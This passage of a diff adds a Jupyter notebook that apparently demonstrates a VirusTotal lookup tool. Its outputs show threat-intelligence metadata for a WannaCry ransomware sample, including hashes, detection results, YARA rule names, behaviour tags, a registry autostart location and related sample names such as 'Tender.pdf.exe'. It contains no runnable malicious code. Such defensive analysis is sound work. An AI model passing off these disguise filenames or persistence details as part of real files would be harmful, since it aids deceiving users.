+       "      <th>detections</th>\n",
+       "      <th>scans</th>\n",
+       "      <th>first_submission</th>\n",
+       "      <th>last_submission</th>\n",
+       "      <th>type</th>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>id</th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa</th>\n",
+       "      <td>1605582797</td>\n",
+       "      <td>3514368</td>\n",
+       "      <td>1325</td>\n",
+       "      <td>diskpart.exe</td>\n",
+       "      <td>Win32 EXE</td>\n",
+       "      <td>1494574270</td>\n",
+       "      <td>67</td>\n",
+       "      <td>76</td>\n",
+       "      <td>2017-05-12 07:31:10+00:00</td>\n",
+       "      <td>2020-11-17 03:13:17+00:00</td>\n",
+       "      <td>file</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ]
+     },
+     "metadata": {},
+     "execution_count": 6
+    }
+   ],
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-10-27T21:31:51.751438Z",
+     "start_time": "2020-10-27T21:31:51.212530Z"
+    }
+   }
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "### Example showing all details for this ID\n",
+    "We can use get_object to retrieve all details\n",
+    "or just look it up directly at https://www.virustotal.com/gui/home/search"
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 34,
+   "source": [
+    "vt_lookup.get_object(FILE, \"file\")"
+   ],
+   "outputs": [
+    {
+     "output_type": "execute_result",
+     "data": {
+      "text/plain": [
+       "                                                                                                                                                                                                                        attributes\n",
+       "authentihash                                                                                                                                                      4b2c4c7f06f5ffaeea6efc537f0aa66b0a30c7ccd7979c86c7f4f996002b99fd\n",
+       "autostart_locations        [{'entry': ' ', 'location': ' '}, {'entry': 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order\\ProviderOrder', 'location': 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order'},...\n",
+       "capabilities_tags                                                                                                                                                  [win_registry, str_win32_winsock2_library, win_files_operation]\n",
+       "creation_date                                                                                                                                                                                                           1290243905\n",
+       "crowdsourced_yara_results  [{'author': 'ReversingLabs', 'description': 'Yara rule that detects WannaCry ransomware.', 'rule_name': 'Win32_Ransomware_WannaCry', 'ruleset_id': '005e5fc7e3', 'ruleset_name': 'Win32.Ransomware.W...\n",
+       "downloadable                                                                                                                                                                                                                  True\n",
+       "exiftool                   {'CharacterSet': 'Unicode', 'CodeSize': '28672', 'CompanyName': 'Microsoft Corporation', 'EntryPoint': '0x77ba', 'FileDescription': 'DiskPart', 'FileFlagsMask': '0x003f', 'FileOS': 'Windows NT 32-...\n",
+       "first_seen_itw_date                                                                                                                                                                                                     1578568742\n",
+       "first_submission_date                                                                                                                                                                                                   1494574270\n",
+       "last_analysis_date                                                                                                                                                                                                      1605638619\n",
+       "last_analysis_results      {'ALYac': {'category': 'malicious', 'engine_name': 'ALYac', 'engine_update': '20201117', 'engine_version': '1.1.1.5', 'method': 'blacklist', 'result': 'Trojan.Ransom.WannaCryptor'}, 'APEX': {'cate...\n",
+       "last_analysis_stats                                                                  {'confirmed-timeout': 0, 'failure': 0, 'harmless': 0, 'malicious': 67, 'suspicious': 0, 'timeout': 1, 'type-unsupported': 4, 'undetected': 4}\n",
+       "last_modification_date                                                                                                                                                                                                  1605645885\n",
+       "last_submission_date                                                                                                                                                                                                    1605582797\n",
+       "magic                                                                                                                                                                      PE32 executable for MS Windows (GUI) Intel 80386 32-bit\n",
+       "md5                                                                                                                                                                                               84c82835a5d21bbcf75a61706d8ab549\n",
+       "meaningful_name                                                                                                                                                                                                       diskpart.exe\n",
+       "names                      [diskpart.exe, C:\\Users\\Work PC\\Downloads\\Test\\Ransomware\\Ransomware.WannaCry\\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6...\n",
+       "packers                                                                                                                                                                                           {'PEiD': 'Microsoft Visual C++'}\n",
+       "pe_info                    {'compiler_product_versions': ['id: 12, version: 7291 count=2', 'id: 11, version: 8047 count=1', 'id: 14, version: 7299 count=4', 'id: 10, version: 8047 count=11', 'id: 4, version: 8047 count=4', ...\n",
+       "reputation                                                                                                                                                                                                                   -2633\n",
+       "sha1                                                                                                                                                                                      5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\n",
+       "sha256                                                                                                                                                            ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\n",
+       "sigma_analysis_stats                                                                                                                                                             {'critical': 2, 'high': 0, 'low': 1, 'medium': 2}\n",
+       "sigma_analysis_summary                                                                                                                   {'Sigma Integrated Rule Set (GitHub)': {'critical': 2, 'high': 0, 'low': 1, 'medium': 2}}\n",
+       "signature_info             {'copyright': '© Microsoft Corporation. All rights reserved.', 'description': 'DiskPart', 'file version': '6.1.7601.17514 (win7sp1_rtm.101119-1850)', 'internal name': 'diskpart.exe', 'original nam...\n",
+       "size                                                                                                                                                                                                                       3514368\n",
+       "ssdeep                                                                                                                                                  98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB\n",
+       "tags                                                                                                                       [peexe, self-delete, overlay, runtime-modules, direct-cpu-clock-access, via-tor, executes-dropped-file]\n",
+       "times_submitted                                                                                                                                                                                                               1325\n",
+       "tlsh                                                                                                                                                      T173F533F4E221B7ACF2550EF64855C59B6A9724B2EBEF1E26DA8001A70D44F7F8FC0491\n",
+       "total_votes                                                                                                                                                                                     {'harmless': 28, 'malicious': 292}\n",
+       "trid                       [{'file_type': 'Win32 Executable MS Visual C++ (generic)', 'probability': 38.5}, {'file_type': 'Microsoft Visual C++ compiled executable (generic)', 'probability': 20.4}, {'file_type': 'Win16 NE e...\n",
+       "type_description                                                                                                                                                                                                         Win32 EXE\n",
+       "type_extension                                                                                                                                                                                                                 exe\n",
+       "type_tag                                                                                                                                                                                                                     peexe\n",
+       "unique_sources                                                                                                                                                                                                                 980\n",
+       "vhash                                                                                                                                                                                                   036046656d1570a8z3631lz1fz\n",
+       "zemana_behaviour                                                                                                                                                                                                   [dll-injection]"
+      ],
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>attributes</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>authentihash</th>\n",
+       "      <td>4b2c4c7f06f5ffaeea6efc537f0aa66b0a30c7ccd7979c86c7f4f996002b99fd</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>autostart_locations</th>\n",
+       "      <td>[{'entry': ' ', 'location': ' '}, {'entry': 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order\\ProviderOrder', 'location': 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order'},...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>capabilities_tags</th>\n",
+       "      <td>[win_registry, str_win32_winsock2_library, win_files_operation]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>creation_date</th>\n",
+       "      <td>1290243905</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>crowdsourced_yara_results</th>\n",
+       "      <td>[{'author': 'ReversingLabs', 'description': 'Yara rule that detects WannaCry ransomware.', 'rule_name': 'Win32_Ransomware_WannaCry', 'ruleset_id': '005e5fc7e3', 'ruleset_name': 'Win32.Ransomware.W...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>downloadable</th>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>exiftool</th>\n",
+       "      <td>{'CharacterSet': 'Unicode', 'CodeSize': '28672', 'CompanyName': 'Microsoft Corporation', 'EntryPoint': '0x77ba', 'FileDescription': 'DiskPart', 'FileFlagsMask': '0x003f', 'FileOS': 'Windows NT 32-...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>first_seen_itw_date</th>\n",
+       "      <td>1578568742</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>first_submission_date</th>\n",
+       "      <td>1494574270</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>last_analysis_date</th>\n",
+       "      <td>1605638619</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>last_analysis_results</th>\n",
+       "      <td>{'ALYac': {'category': 'malicious', 'engine_name': 'ALYac', 'engine_update': '20201117', 'engine_version': '1.1.1.5', 'method': 'blacklist', 'result': 'Trojan.Ransom.WannaCryptor'}, 'APEX': {'cate...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>last_analysis_stats</th>\n",
+       "      <td>{'confirmed-timeout': 0, 'failure': 0, 'harmless': 0, 'malicious': 67, 'suspicious': 0, 'timeout': 1, 'type-unsupported': 4, 'undetected': 4}</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>last_modification_date</th>\n",
+       "      <td>1605645885</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>last_submission_date</th>\n",
+       "      <td>1605582797</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>magic</th>\n",
+       "      <td>PE32 executable for MS Windows (GUI) Intel 80386 32-bit</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>md5</th>\n",
+       "      <td>84c82835a5d21bbcf75a61706d8ab549</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>meaningful_name</th>\n",
+       "      <td>diskpart.exe</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>names</th>\n",
+       "      <td>[diskpart.exe, C:\\Users\\Work PC\\Downloads\\Test\\Ransomware\\Ransomware.WannaCry\\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>packers</th>\n",
+       "      <td>{'PEiD': 'Microsoft Visual C++'}</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>pe_info</th>\n",
+       "      <td>{'compiler_product_versions': ['id: 12, version: 7291 count=2', 'id: 11, version: 8047 count=1', 'id: 14, version: 7299 count=4', 'id: 10, version: 8047 count=11', 'id: 4, version: 8047 count=4', ...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>reputation</th>\n",
+       "      <td>-2633</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>sha1</th>\n",
+       "      <td>5ff465afaabcbf0150d1a3ab2c2e74f3a4426467</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>sha256</th>\n",
+       "      <td>ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>sigma_analysis_stats</th>\n",
+       "      <td>{'critical': 2, 'high': 0, 'low': 1, 'medium': 2}</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>sigma_analysis_summary</th>\n",
+       "      <td>{'Sigma Integrated Rule Set (GitHub)': {'critical': 2, 'high': 0, 'low': 1, 'medium': 2}}</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>signature_info</th>\n",
+       "      <td>{'copyright': '© Microsoft Corporation. All rights reserved.', 'description': 'DiskPart', 'file version': '6.1.7601.17514 (win7sp1_rtm.101119-1850)', 'internal name': 'diskpart.exe', 'original nam...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>size</th>\n",
+       "      <td>3514368</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ssdeep</th>\n",
+       "      <td>98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>tags</th>\n",
+       "      <td>[peexe, self-delete, overlay, runtime-modules, direct-cpu-clock-access, via-tor, executes-dropped-file]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>times_submitted</th>\n",
+       "      <td>1325</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>tlsh</th>\n",
+       "      <td>T173F533F4E221B7ACF2550EF64855C59B6A9724B2EBEF1E26DA8001A70D44F7F8FC0491</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>total_votes</th>\n",
+       "      <td>{'harmless': 28, 'malicious': 292}</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>trid</th>\n",
+       "      <td>[{'file_type': 'Win32 Executable MS Visual C++ (generic)', 'probability': 38.5}, {'file_type': 'Microsoft Visual C++ compiled executable (generic)', 'probability': 20.4}, {'file_type': 'Win16 NE e...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>type_description</th>\n",
+       "      <td>Win32 EXE</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>type_extension</th>\n",
+       "      <td>exe</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>type_tag</th>\n",
+       "      <td>peexe</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>unique_sources</th>\n",
+       "      <td>980</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>vhash</th>\n",
+       "      <td>036046656d1570a8z3631lz1fz</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>zemana_behaviour</th>\n",
+       "      <td>[dll-injection]</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ]
+     },
+     "metadata": {},
+     "execution_count": 34
+    }
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "source": [
+    "example_relationship_df = vt_lookup.lookup_ioc_relationships(\r\n",
+    "    observable=FILE, \r\n",
+    "    vt_type='file', \r\n",
+    "    relationship='execution_parents')\r\n",
+    "example_relationship_df"
+   ],
+   "outputs": [
+    {
+     "output_type": "execute_result",
+     "data": {
+      "text/plain": [
+       "                                                                                                                                  target_type  \\\n",
+       "source                                                           target                                                                         \n",
+       "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa 018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f        file   \n",
+       "                                                                 02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd        file   \n",
+       "                                                                 06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf        file   \n",
+       "                                                                 06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff        file   \n",
+       "                                                                 070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d        file   \n",
+       "...                                                                                                                                       ...   \n",
+       "                                                                 f1aa23299987eed2173e83d26b6078232051f885586ebba35699143b83bc68ad        file   \n",
+       "                                                                 f2916486e380d0c0bbd31694b05509b91f0f622478595eba89b30031f9f64c3c        file   \n",
+       "                                                                 fbf74ee5d011dfb0d6c3357446ea3999ef62b088c553d665847aece28a1d3e2b        file   \n",
+       "                                                                 ff6af3f113f61f823e422b7eb9e379495b81bdbb66a4e4e159b4caee8a79bada        file   \n",
+       "                                                                 0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03        file   \n",
+       "\n",
+       "                                                                                                                                  source_type  \\\n",
+       "source                                                           target                                                                         \n",
+       "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa 018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f        file   \n",
+       "                                                                 02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd        file   \n",
+       "                                                                 06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf        file   \n",
+       "                                                                 06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff        file   \n",
+       "                                                                 070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d        file   \n",
+       "...                                                                                                                                       ...   \n",
+       "                                                                 f1aa23299987eed2173e83d26b6078232051f885586ebba35699143b83bc68ad        file   \n",
+       "                                                                 f2916486e380d0c0bbd31694b05509b91f0f622478595eba89b30031f9f64c3c        file   \n",
+       "                                                                 fbf74ee5d011dfb0d6c3357446ea3999ef62b088c553d665847aece28a1d3e2b        file   \n",
+       "                                                                 ff6af3f113f61f823e422b7eb9e379495b81bdbb66a4e4e159b4caee8a79bada        file   \n",
+       "                                                                 0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03        file   \n",
+       "\n",
+       "                                                                                                                                   relationship_type  \n",
+       "source                                                           target                                                                               \n",
+       "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa 018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f  execution_parents  \n",
+       "                                                                 02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd  execution_parents  \n",
+       "                                                                 06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf  execution_parents  \n",
+       "                                                                 06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff  execution_parents  \n",
+       "                                                                 070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d  execution_parents  \n",
+       "...                                                                                                                                              ...  \n",
+       "                                                                 f1aa23299987eed2173e83d26b6078232051f885586ebba35699143b83bc68ad  execution_parents  \n",
+       "                                                                 f2916486e380d0c0bbd31694b05509b91f0f622478595eba89b30031f9f64c3c  execution_parents  \n",
+       "                                                                 fbf74ee5d011dfb0d6c3357446ea3999ef62b088c553d665847aece28a1d3e2b  execution_parents  \n",
+       "                                                                 ff6af3f113f61f823e422b7eb9e379495b81bdbb66a4e4e159b4caee8a79bada  execution_parents  \n",
+       "                                                                 0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03  execution_parents  \n",
+       "\n",
+       "[106 rows x 3 columns]"
+      ],
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th>target_type</th>\n",
+       "      <th>source_type</th>\n",
+       "      <th>relationship_type</th>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>source</th>\n",
+       "      <th>target</th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th rowspan=\"11\" valign=\"top\">ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa</th>\n",
+       "      <th>018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f</th>\n",
+       "      <td>file</td>\n",
+       "      <td>file</td>\n",
+       "      <td>execution_parents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd</th>\n",
+       "      <td>file</td>\n",
+       "      <td>file</td>\n",
+       "      <td>execution_parents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf</th>\n",
+       "      <td>file</td>\n",
+       "      <td>file</td>\n",
+       "      <td>execution_parents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff</th>\n",
+       "      <td>file</td>\n",
+       "      <td>file</td>\n",
+       "      <td>execution_parents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d</th>\n",
+       "      <td>file</td>\n",
+       "      <td>file</td>\n",
+       "      <td>execution_parents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>...</th>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>f1aa23299987eed2173e83d26b6078232051f885586ebba35699143b83bc68ad</th>\n",
+       "      <td>file</td>\n",
+       "      <td>file</td>\n",
+       "      <td>execution_parents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>f2916486e380d0c0bbd31694b05509b91f0f622478595eba89b30031f9f64c3c</th>\n",
+       "      <td>file</td>\n",
+       "      <td>file</td>\n",
+       "      <td>execution_parents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>fbf74ee5d011dfb0d6c3357446ea3999ef62b088c553d665847aece28a1d3e2b</th>\n",
+       "      <td>file</td>\n",
+       "      <td>file</td>\n",
+       "      <td>execution_parents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ff6af3f113f61f823e422b7eb9e379495b81bdbb66a4e4e159b4caee8a79bada</th>\n",
+       "      <td>file</td>\n",
+       "      <td>file</td>\n",
+       "      <td>execution_parents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03</th>\n",
+       "      <td>file</td>\n",
+       "      <td>file</td>\n",
+       "      <td>execution_parents</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>106 rows × 3 columns</p>\n",
+       "</div>"
+      ]
+     },
+     "metadata": {},
+     "execution_count": 8
+    }
+   ],
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-10-27T21:31:54.161990Z",
+     "start_time": "2020-10-27T21:31:52.118438Z"
+    }
+   }
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "### Obtaining result for multiple entities\n",
+    "\n",
+    "The function `lookup_iocs` is able to obtain attributes for all the rows in a DataFrame. If no `observable_column` and `observable_type` parameters are specified, the function will obtain the attributes of all the entities that are in the column `target`, and will obtain their types from the `target_type` column.\n",
+    "\n",
+    "This function is especially useful when a user has obtained a set of relationships, and would like to obtain their attributes.\n",
+    "\n",
+    "> **Note:** it can take some time to fetch results, depending on the number of nodes and relationships."
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 9,
+   "source": [
+    "example_multiple_attribute_df = vt_lookup.lookup_iocs(example_relationship_df)\r\n",
+    "example_multiple_attribute_df"
+   ],
+   "outputs": [
+    {
+     "output_type": "execute_result",
+     "data": {
+      "text/plain": [
+       "                                                                  last_submission_date  \\\n",
+       "id                                                                                       \n",
+       "018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f            1526215996   \n",
+       "02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd            1571387079   \n",
+       "06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf            1588342161   \n",
+       "06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff            1595479073   \n",
+       "070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d            1601363298   \n",
+       "...                                                                                ...   \n",
+       "f1aa23299987eed2173e83d26b6078232051f885586ebba35699143b83bc68ad            1563994865   \n",
+       "f2916486e380d0c0bbd31694b05509b91f0f622478595eba89b30031f9f64c3c            1518624409   \n",
+       "fbf74ee5d011dfb0d6c3357446ea3999ef62b088c553d665847aece28a1d3e2b            1573073940   \n",
+       "ff6af3f113f61f823e422b7eb9e379495b81bdbb66a4e4e159b4caee8a79bada            1576634480   \n",
+       "0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03            1583318742   \n",
+       "\n",
+       "                                                                     size  \\\n",
+       "id                                                                          \n",
+       "018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f  3723264   \n",
+       "02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd  9164800   \n",
+       "06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf  3991221   \n",
+       "06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff  4535704   \n",
+       "070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d  3723264   \n",
+       "...                                                                   ...   \n",
+       "f1aa23299987eed2173e83d26b6078232051f885586ebba35699143b83bc68ad  3723392   \n",
+       "f2916486e380d0c0bbd31694b05509b91f0f622478595eba89b30031f9f64c3c  3676610   \n",
+       "fbf74ee5d011dfb0d6c3357446ea3999ef62b088c553d665847aece28a1d3e2b  3811580   \n",
+       "ff6af3f113f61f823e422b7eb9e379495b81bdbb66a4e4e159b4caee8a79bada  3597101   \n",
+       "0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03  3723264   \n",
+       "\n",
+       "                                                                  times_submitted  \\\n",
+       "id                                                                                  \n",
+       "018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f                6   \n",
+       "02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd                4   \n",
+       "06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf                1   \n",
+       "06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff                1   \n",
+       "070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d                9   \n",
+       "...                                                                           ...   \n",
+       "f1aa23299987eed2173e83d26b6078232051f885586ebba35699143b83bc68ad                1   \n",
+       "f2916486e380d0c0bbd31694b05509b91f0f622478595eba89b30031f9f64c3c                5   \n",
+       "fbf74ee5d011dfb0d6c3357446ea3999ef62b088c553d665847aece28a1d3e2b                1   \n",
+       "ff6af3f113f61f823e422b7eb9e379495b81bdbb66a4e4e159b4caee8a79bada                1   \n",
+       "0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03                1   \n",
+       "\n",
+       "                                                                                                       meaningful_name  \\\n",
+       "id                                                                                                                       \n",
+       "018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f                8479206ff1a47362199ddabebb7358d2.virus   \n",
+       "02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd  =?UTF-8?B?572R5piT5bel5YW3566x56uv5ZCv5YqoLmV4ZQ==?=   \n",
+       "06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf                                        Tender.pdf.exe   \n",
+       "06c676bf8f5c6af99172c1cf63a84348628ae3f39df9e523c42447e2045e00ff                                               car.exe   \n",
+       "070f603e0443b1fae57425210fb3b27c2f77d8983cfefefb0ee185de572df33d                                          lhdfrgui.exe   \n",
+       "...                                                                                                                ...   \n",
+       "f1aa23299987eed2173e83d26b6078232051f885586ebba35699143b83bc68ad                                          lhdfrgui.exe   \n",
+       "f2916486e380d0c0bbd31694b05509b91f0f622478595eba89b30031f9f64c3c            acdsee.ultimate.10.x.unipatch_WannaCry.exe   \n",
+       "fbf74ee5d011dfb0d6c3357446ea3999ef62b088c553d665847aece28a1d3e2b                                      Presentation.exe   \n",
+       "ff6af3f113f61f823e422b7eb9e379495b81bdbb66a4e4e159b4caee8a79bada                                    ShieldPassword.exe   \n",
+       "0d592a8d7e13210140f106a897a211b839608c2e9e86f20419e30d4087b7ac03                                          lhdfrgui.exe   \n",
+       "\n",
+       "                                                                 type_description  \\\n",
+       "id                                                                                  \n",
+       "018ac8f95d5e14b92011cdbfc8c48056ca4891161ed6bdd268770a5b56bb327f        Win32 EXE   \n",
+       "02a7977d1faf7bfc93a4b678a049c9495ea663e7065aa5a6caf0f69c5ff25dbd        Win32 EXE   \n",
+       "06b020a3fd3296bc4c7bf53307fe7b40638e7f445bdd43fac1d04547a429fdaf        Win32 EXE   \n",
